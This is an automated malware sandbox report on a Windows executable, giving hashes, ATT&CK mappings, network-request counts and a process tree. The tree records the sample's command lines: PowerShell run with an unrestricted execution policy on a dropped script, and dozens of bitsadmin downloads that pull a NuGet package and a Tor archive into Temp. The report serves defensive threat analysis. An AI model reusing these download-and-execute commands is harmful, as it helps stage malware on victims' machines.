0a4e3dbb8da66ebce5d2648bd5ae33c3f01048b1bb10aaab580b5505c55fec24

Analysis

max time kernel
127s
max time network
137s
platform
windows7_x64
resource
win7-20220414-en
submitted
30-05-2022 15:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0a4e3dbb8da66ebce5d2648bd5ae33c3f01048b1bb10aaab580b5505c55fec24.exe
Size

180KB
MD5

a4b630df08fbfb2fe70dfc614456c6d9
SHA1

43b168a777385b62cf2169bc92e711686aceb509
SHA256

0a4e3dbb8da66ebce5d2648bd5ae33c3f01048b1bb10aaab580b5505c55fec24
SHA512

50ddc6b43ed98cfe2b726f11adf7240d6826e326a682e0ec90edc157228e15ff6a0abab5d6602307026abe203486fd683c2d2329ac7c1f596abf90a46fd598da

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://chocolatey.org/7za.exe

Signatures

Blocklisted process makes network request 64 IoCs

flow	pid	Process
5	320	powershell.exe
6	320	powershell.exe
10	320	powershell.exe
11	320	powershell.exe
14	320	powershell.exe
15	320	powershell.exe
18	320	powershell.exe
19	320	powershell.exe
22	320	powershell.exe
23	320	powershell.exe
26	320	powershell.exe
27	320	powershell.exe
30	320	powershell.exe
31	320	powershell.exe
34	320	powershell.exe
35	320	powershell.exe
38	320	powershell.exe
39	320	powershell.exe
42	320	powershell.exe
43	320	powershell.exe
46	320	powershell.exe
47	320	powershell.exe
50	320	powershell.exe
51	320	powershell.exe
55	320	powershell.exe
56	320	powershell.exe
59	320	powershell.exe
60	320	powershell.exe
63	320	powershell.exe
64	320	powershell.exe
67	320	powershell.exe
68	320	powershell.exe
71	320	powershell.exe
72	320	powershell.exe
75	320	powershell.exe
76	320	powershell.exe
79	320	powershell.exe
80	320	powershell.exe
83	320	powershell.exe
84	320	powershell.exe
87	320	powershell.exe
88	320	powershell.exe
91	320	powershell.exe
92	320	powershell.exe
95	320	powershell.exe
96	320	powershell.exe
99	320	powershell.exe
100	320	powershell.exe
103	320	powershell.exe
104	320	powershell.exe
107	320	powershell.exe
108	320	powershell.exe
111	320	powershell.exe
112	320	powershell.exe
115	320	powershell.exe
116	320	powershell.exe
119	320	powershell.exe
120	320	powershell.exe
123	320	powershell.exe
124	320	powershell.exe
127	320	powershell.exe
128	320	powershell.exe
131	320	powershell.exe
132	320	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Download via BitsAdmin 1 TTPs 33 IoCs

dropper

BITS Jobs

T1197

pid	Process
1732	bitsadmin.exe
336	bitsadmin.exe
1764	bitsadmin.exe
1956	bitsadmin.exe
1224	bitsadmin.exe
680	bitsadmin.exe
956	bitsadmin.exe
696	bitsadmin.exe
1616	bitsadmin.exe
336	bitsadmin.exe
804	bitsadmin.exe
1916	bitsadmin.exe
1420	bitsadmin.exe
1876	bitsadmin.exe
1936	bitsadmin.exe
892	bitsadmin.exe
892	bitsadmin.exe
1772	bitsadmin.exe
908	bitsadmin.exe
1336	bitsadmin.exe
1552	bitsadmin.exe
268	bitsadmin.exe
608	bitsadmin.exe
1172	bitsadmin.exe
1044	bitsadmin.exe
1556	bitsadmin.exe
1244	bitsadmin.exe
804	bitsadmin.exe
1652	bitsadmin.exe
1868	bitsadmin.exe
1176	bitsadmin.exe
564	bitsadmin.exe
1628	bitsadmin.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	320	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1792 wrote to memory of 1672	1792	0a4e3dbb8da66ebce5d2648bd5ae33c3f01048b1bb10aaab580b5505c55fec24.exe	29
PID 1792 wrote to memory of 1672	1792	0a4e3dbb8da66ebce5d2648bd5ae33c3f01048b1bb10aaab580b5505c55fec24.exe	29
PID 1792 wrote to memory of 1672	1792	0a4e3dbb8da66ebce5d2648bd5ae33c3f01048b1bb10aaab580b5505c55fec24.exe	29
PID 1792 wrote to memory of 1672	1792	0a4e3dbb8da66ebce5d2648bd5ae33c3f01048b1bb10aaab580b5505c55fec24.exe	29
PID 1672 wrote to memory of 320	1672	cmd.exe	31
PID 1672 wrote to memory of 320	1672	cmd.exe	31
PID 1672 wrote to memory of 320	1672	cmd.exe	31
PID 1672 wrote to memory of 320	1672	cmd.exe	31
PID 1672 wrote to memory of 1660	1672	cmd.exe	32
PID 1672 wrote to memory of 1660	1672	cmd.exe	32
PID 1672 wrote to memory of 1660	1672	cmd.exe	32
PID 1672 wrote to memory of 1660	1672	cmd.exe	32
PID 320 wrote to memory of 828	320	powershell.exe	33
PID 320 wrote to memory of 828	320	powershell.exe	33
PID 320 wrote to memory of 828	320	powershell.exe	33
PID 320 wrote to memory of 828	320	powershell.exe	33
PID 828 wrote to memory of 1936	828	cmd.exe	35
PID 828 wrote to memory of 1936	828	cmd.exe	35
PID 828 wrote to memory of 1936	828	cmd.exe	35
PID 828 wrote to memory of 1936	828	cmd.exe	35
PID 320 wrote to memory of 856	320	powershell.exe	36
PID 320 wrote to memory of 856	320	powershell.exe	36
PID 320 wrote to memory of 856	320	powershell.exe	36
PID 320 wrote to memory of 856	320	powershell.exe	36
PID 856 wrote to memory of 1956	856	cmd.exe	38
PID 856 wrote to memory of 1956	856	cmd.exe	38
PID 856 wrote to memory of 1956	856	cmd.exe	38
PID 856 wrote to memory of 1956	856	cmd.exe	38
PID 320 wrote to memory of 240	320	powershell.exe	39
PID 320 wrote to memory of 240	320	powershell.exe	39
PID 320 wrote to memory of 240	320	powershell.exe	39
PID 320 wrote to memory of 240	320	powershell.exe	39
PID 240 wrote to memory of 1616	240	cmd.exe	41
PID 240 wrote to memory of 1616	240	cmd.exe	41
PID 240 wrote to memory of 1616	240	cmd.exe	41
PID 240 wrote to memory of 1616	240	cmd.exe	41
PID 320 wrote to memory of 548	320	powershell.exe	42
PID 320 wrote to memory of 548	320	powershell.exe	42
PID 320 wrote to memory of 548	320	powershell.exe	42
PID 320 wrote to memory of 548	320	powershell.exe	42
PID 548 wrote to memory of 1044	548	cmd.exe	44
PID 548 wrote to memory of 1044	548	cmd.exe	44
PID 548 wrote to memory of 1044	548	cmd.exe	44
PID 548 wrote to memory of 1044	548	cmd.exe	44
PID 320 wrote to memory of 1212	320	powershell.exe	45
PID 320 wrote to memory of 1212	320	powershell.exe	45
PID 320 wrote to memory of 1212	320	powershell.exe	45
PID 320 wrote to memory of 1212	320	powershell.exe	45
PID 1212 wrote to memory of 336	1212	cmd.exe	47
PID 1212 wrote to memory of 336	1212	cmd.exe	47
PID 1212 wrote to memory of 336	1212	cmd.exe	47
PID 1212 wrote to memory of 336	1212	cmd.exe	47
PID 320 wrote to memory of 1940	320	powershell.exe	48
PID 320 wrote to memory of 1940	320	powershell.exe	48
PID 320 wrote to memory of 1940	320	powershell.exe	48
PID 320 wrote to memory of 1940	320	powershell.exe	48
PID 1940 wrote to memory of 892	1940	cmd.exe	50
PID 1940 wrote to memory of 892	1940	cmd.exe	50
PID 1940 wrote to memory of 892	1940	cmd.exe	50
PID 1940 wrote to memory of 892	1940	cmd.exe	50
PID 320 wrote to memory of 1652	320	powershell.exe	51
PID 320 wrote to memory of 1652	320	powershell.exe	51
PID 320 wrote to memory of 1652	320	powershell.exe	51
PID 320 wrote to memory of 1652	320	powershell.exe	51

C:\Users\Admin\AppData\Local\Temp\0a4e3dbb8da66ebce5d2648bd5ae33c3f01048b1bb10aaab580b5505c55fec24.exe
"C:\Users\Admin\AppData\Local\Temp\0a4e3dbb8da66ebce5d2648bd5ae33c3f01048b1bb10aaab580b5505c55fec24.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1792
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell -ep Unrestricted -f "C:\ProgramData\35dMeo.ps1" | find /v "" >> "C:\Users\Admin\AppData\Local\Temp\WYZSGDWS.log"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1672
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep Unrestricted -f "C:\ProgramData\35dMeo.ps1"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:320
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:828
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1936
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:856
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1956
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:240
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1616
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:548
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1044
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1212
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:336
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1940
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:892
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:1652
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1556
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:772
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1868
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:964
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1336
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:1360
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1224
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:992
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1732
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:1876
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:804
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:996
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1552
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:1152
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1176
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:696
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:336
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:1832
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1916
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:1496
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:956
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:992
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1772
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:1788
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:564
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:1696
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1244
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:1072
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:268
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:1052
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:804
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:1552
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:908
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:564
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:608
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:1508
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1420
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:280
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:680
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:1584
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1628
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:1176
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1172
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:608
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:892
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:568
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1764
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:1052
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:696
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
      4⤵
      PID:1684
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\4NJcw.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1652
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://torproject.urown.net/dist/torbrowser/7.0.8/tor-win32-0.3.1.7.zip" "C:\Users\Admin\AppData\Local\Temp\wbSJ2m.zip"
      4⤵
      PID:680
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://torproject.urown.net/dist/torbrowser/7.0.8/tor-win32-0.3.1.7.zip" "C:\Users\Admin\AppData\Local\Temp\wbSJ2m.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1876
- - C:\Windows\SysWOW64\find.exe
    find /v ""
    3⤵
    PID:1660

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

BITS Jobs

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\35dMeo.ps1

Filesize
7KB

MD5
cd6fedbf388e2ffdf605cbef41a38f48

SHA1
743ba9c19f87cfdbaa5bbed1dfb6ed5c40617fb4

SHA256
442f80848906620f7be903d20147e424d50fd1d8119f1ead07a6305f09c849c7

SHA512
c2b177ec92814beb22587c0d89d9e043da2a77182960da418d0d3346c285c8e33cfc8b225de4fb3e239f0c496f12908175541ffe9d3318d71297e5ee98029691

Download Submit
memory/320-74-0x0000000070F70000-0x0000000071084000-memory.dmp

Filesize
1.1MB

Download
memory/320-63-0x0000000074390000-0x00000000743B5000-memory.dmp

Filesize
148KB

Download
memory/320-75-0x0000000070910000-0x0000000070F61000-memory.dmp

Filesize
6.3MB

Download
memory/320-64-0x0000000073F90000-0x0000000074015000-memory.dmp

Filesize
532KB

Download
memory/320-62-0x00000000743C0000-0x000000007440B000-memory.dmp

Filesize
300KB

Download
memory/320-61-0x0000000074410000-0x0000000074491000-memory.dmp

Filesize
516KB

Download
memory/320-65-0x0000000071950000-0x00000000719EC000-memory.dmp

Filesize
624KB

